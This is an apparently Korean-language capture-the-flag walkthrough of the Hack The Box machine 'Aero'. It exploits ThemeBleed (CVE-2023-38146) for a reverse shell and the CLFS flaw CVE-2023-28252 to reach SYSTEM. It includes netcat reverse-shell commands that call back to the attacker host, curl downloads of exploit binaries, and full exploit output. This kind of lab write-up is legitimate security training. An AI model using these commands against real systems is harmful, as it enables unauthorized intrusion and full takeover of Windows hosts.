Proof of Concept
10.129.229.128
Nmap
PORT STATE SERVICE
80/tcp open httpInitial Access
80포트 웹서비스 메인 페이지에서 “Windows 11 theme repository” 서비스를 사용중이며, 이메일 정보를 확인
/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Aero]
└─$ cat /etc/hosts
<SNIP>
10.129.229.128 aerohub.htb“Windows 11 theme repository” 서비스 RCE 취약점 발견
POC 코드 다운로드
┌──(kali㉿kali)-[~/Aero]
└─$ git clone https://github.com/Jnnshschl/CVE-2023-38146.git
Cloning into 'CVE-2023-38146'...
remote: Enumerating objects: 27, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 27 (delta 10), reused 20 (delta 6), pack-reused 0 (from 0)
Receiving objects: 100% (27/27), 845.11 KiB | 4.06 MiB/s, done.
Resolving deltas: 100% (10/10), done.POC 실행
┌──(kali㉿kali)-[~/Aero/CVE-2023-38146]
└─$ python themebleed.py -r 10.10.14.248 -p 4711
2026-02-14 22:37:37,419 INFO> ThemeBleed CVE-2023-38146 PoC [https://github.com/Jnnshschl]
2026-02-14 22:37:37,420 INFO> Credits to -> https://github.com/gabe-k/themebleed, impacket and cabarchive
2026-02-14 22:37:40,112 INFO> Compiled DLL: "./tb/Aero.msstyles_vrf_evil.dll"
2026-02-14 22:37:40,114 INFO> Theme generated: "evil_theme.theme"
2026-02-14 22:37:40,115 INFO> Themepack generated: "evil_theme.themepack"
2026-02-14 22:37:40,115 INFO> Remember to start netcat: rlwrap -cAr nc -lvnp 4711
2026-02-14 22:37:40,116 INFO> Starting SMB server: 10.10.14.248:445
2026-02-14 22:37:40,118 INFO> Config file parsed
2026-02-14 22:37:40,118 INFO> Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2026-02-14 22:37:40,119 INFO> Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2026-02-14 22:37:40,120 INFO> Config file parsed
2026-02-14 22:37:40,120 INFO> Config file parsedNC 리스너 실행
┌──(kali㉿kali)-[~/Aero]
└─$ rlwrap nc -nlvp 4711
listening on [any] 4711 ...이후 “Windows 11 theme repository” 서비스 웹 페이지에서 “evil_theme.theme” 또는 “evil_theme.themepack” 파일 업로드 시 리버스 쉘이 연결됨
┌──(kali㉿kali)-[~/Aero]
└─$ rlwrap nc -nlvp 4711
listening on [any] 4711 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.229.128] 62988
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32>Read user.txt
PS C:\Users\sam.emerson\Desktop> type user.txt
type user.txt
4947c7ede773115e9b67a0736a164e53
PS C:\Users\sam.emerson\Desktop> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::ba
IPv6 Address. . . . . . . . . . . : dead:beef::df82:756d:5483:e6eb
Temporary IPv6 Address. . . . . . : dead:beef::3c42:db99:5471:4d5c
Link-local IPv6 Address . . . . . : fe80::288a:1f0b:afbf:f7b%13
IPv4 Address. . . . . . . . . . . : 10.129.229.128
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%13
10.129.0.1Privilege Escalation
C:\Users\sam.emerson\Documents 디렉토리에서 파일 두 개 발견
- CVE-2023-28252_Summary.pdf
- watchdog.ps1
PS C:\Users\sam.emerson\Documents> dir
dir
Directory: C:\Users\sam.emerson\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/21/2023 9:18 AM 14158 CVE-2023-28252_Summary.pdf
-a---- 9/26/2023 1:06 PM 1113 watchdog.ps1PDF 파일 내용을 통해 타겟 시스템이 CVE-2023-28252에 취약한 것을 확인
CVE-2023-28252 Summary:
Vulnerability Type: Privilege Escalation
Target Component: Common Log File System (CLFS)
Risk Level: Critical
Exploitation Date: February 2022 onwards
Patch Released by Microsoft: April 2023
Background:
The Nokoyawa ransomware group has been active since February 2022, and it was only
in April 2023 that Microsoft released a patch to address this issue. This
vulnerability has been used as a means for attackers to gain unauthorized access to
Windows systems, making it imperative for us to apply the necessary patch to
safeguard our infrastructure.
According to Kaspersky’s analysis, the Nokoyawa ransomware group has used other
exploits targeting the CLFS driver since June 2022, with similar but distinct
characteristics, all linked to a single exploit developer.
Actions Required:
Immediate Patching: We strongly recommend applying the security patch released by
Microsoft for CVE-2023-28252 as soon as possible to mitigate the risk associated
with this vulnerability. Failing to do so could leave our servers exposed to
potential exploitation.
Review and Monitoring: In addition to patching, we should conduct a thorough review
of our server logs to check for any signs of suspicious activity or unauthorized
access. Continuous monitoring of our server environment is crucial to ensure the
security of our systems.
Security Awareness: It is essential to remind all team members of the importance of
practicing good cybersecurity hygiene. Encourage the use of strong, unique
passwords and two-factor authentication wherever applicable.
Incident Response Plan: Ensure that our incident response plan is up-to-date and
ready for immediate activation in case of any security incidents. Timely detection
and response are critical in mitigating the impact of potential attacks.POC 다운로드
┌──(kali㉿kali)-[~/Aero]
└─$ git clone https://github.com/bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252.git
Cloning into 'Compiled-PoC-Binary-For-CVE-2023-28252'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (15/15), 163.42 KiB | 8.60 MiB/s, done.
Resolving deltas: 100% (2/2), done.exploit을 위한 clfs_eop.exe 파일과 nc64.exe 파일을 타겟으로 이동
PS C:\Users\sam.emerson\Documents> curl.exe -O http://10.10.14.248:8000/clfs_eop.exe
curl.exe -O http://10.10.14.248:8000/clfs_eop.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 343k 100 343k 0 0 207k 0 0:00:01 0:00:01 --:--:-- 207k
PS C:\Users\sam.emerson\Documents> curl.exe -O http://10.10.14.248:8000/nc64.exe
curl.exe -O http://10.10.14.248:8000/nc64.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 45272 100 45272 0 0 48902 0 --:--:-- --:--:-- --:--:-- 48889
PS C:\Users\sam.emerson\Documents> dir
dir
Directory: C:\Users\sam.emerson\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/14/2026 7:55 PM 351232 clfs_eop.exe
-a---- 9/21/2023 9:18 AM 14158 CVE-2023-28252_Summary.pdf
-a---- 2/14/2026 7:55 PM 45272 nc64.exe
-a---- 9/26/2023 1:06 PM 1113 watchdog.ps1 NC 리버스쉘 리스너 실행
┌──(kali㉿kali)-[~/Aero]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...POC 실행
PS C:\Users\sam.emerson\Documents> .\clfs_eop.exe ".\nc64.exe 10.10.14.248 4444 -e cmd.exe" 1208 1
.\clfs_eop.exe ".\nc64.exe 10.10.14.248 4444 -e cmd.exe" 1208 1
ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1
VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FFD84FC4240
[+] pool NpAt VirtualAddress -->FFFFDB0CF3ED5000
[+] MY EPROCESSS FFFF800F49FDA0C0
[+] SYSTEM EPROCESSS FFFF800F44AA1040
[+] _ETHREAD ADDRESS FFFF800F48B9E080
[+] PREVIOUS MODE ADDRESS FFFF800F48B9E2B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF80525F93220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF80525FABFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF80527343010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF805279C87B0
[+] Kernel PoFxProcessorNotification --------------------------> FFFFF805273DBD00
PATHS
[+] Folder Public Path = C:\Users\Public
[+] Base log file name path= LOG:C:\Users\Public\62
[+] Base file path = C:\Users\Public\62.blf
[+] Container file name path = C:\Users\Public\.p_62
Last kernel CLFS address = FFFFDB0CF0A6F000
numero de tags CLFS founded 14
Last kernel CLFS address = FFFFDB0CFFBAF000
numero de tags CLFS founded 1
[+] Log file handle: 00000000000000F0
[+] Pool CLFS kernel address: FFFFDB0CFFBAF000
number of pipes created =5000
number of pipes created =4000
TRIGGER START
System_token_value: 4141414141414141
TRYING AGAIN
TRIGGER START
System_token_value: FFFFDB0CEE0654FA
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM관리자 권한으로 리버스쉘 연결 성공
┌──(kali㉿kali)-[~/Aero]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.229.128] 62993
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.
C:\Users\sam.emerson\Documents>whoami
whoami
nt authority\systemRead root.txt
C:\Users\Administrator\Desktop>type root.txt
type root.txt
b654d38111468b94413805e4071e008c
C:\Users\Administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::ba
IPv6 Address. . . . . . . . . . . : dead:beef::df82:756d:5483:e6eb
Temporary IPv6 Address. . . . . . : dead:beef::3c42:db99:5471:4d5c
Link-local IPv6 Address . . . . . : fe80::288a:1f0b:afbf:f7b%13
IPv4 Address. . . . . . . . . . . : 10.129.229.128
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%13
10.129.0.1